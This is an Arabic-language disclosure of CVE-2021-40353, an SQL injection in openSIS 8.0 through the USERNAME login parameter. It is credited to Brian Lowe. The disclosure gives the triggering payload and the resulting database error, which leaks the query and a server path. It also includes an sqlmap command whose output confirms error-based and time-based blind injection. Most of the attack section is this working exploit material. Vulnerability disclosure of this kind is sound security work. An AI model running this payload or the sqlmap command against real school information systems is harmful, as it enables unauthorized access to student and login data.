
CVE-2021-40353 openSIS 8.0 ثغرة حقن SQL
CVE-2021-40353 ثغرة حقن SQL في openSIS 8.0 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353
توجد ثغرة حقن SQL في الإصدار 8.0 من openSIS عند استخدام MySQL أو MariaDB كقاعدة بيانات للتطبيق. يمكن للمهاجم إصدار أمر SQL عبر معامل USERNAME.
صفحة PHP القابلة للاستغلال:
index.php - معامل USERNAME
الحمولة القابلة للاستغلال ' - سينتج خطأ مع معلومات قاعدة البيانات " - لا ينتج الخطأ
الخطأ
التاريخ:
08/31/2021 03:16:22
إشعار الفشل:
فشل تنفيذ قاعدة البيانات
SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') التتبع: C:\xampp\htdocs\opensis\index.php at 502 معلومات إضافية: لديك خطأ في تركيب SQL؛ راجع الدليل المطابق لإصدار خادم MariaDB للحصول على التركيب الصحيح بالقرب من ''user1'')' في السطر 1 التاريخ:
08/31/2021 03:16:22
واجه openSIS خطأ قد يكون ناتجًا عن أي مما يلي:
إدخال بيانات غير صالح
خطأ SQL في قاعدة البيانات
خطأ في البرنامج
يرجى أخذ لقطة شاشة وإرسالها إلى ممثل openSIS الخاص بك لتصحيح الأخطاء وحلها.
sqlmap -r post_opensis -p USERNAME
[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:38:19] [INFO] testing 'MySQL inline queries' [09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
اكتشف بواسطة Brian Lowe، أغسطس 2021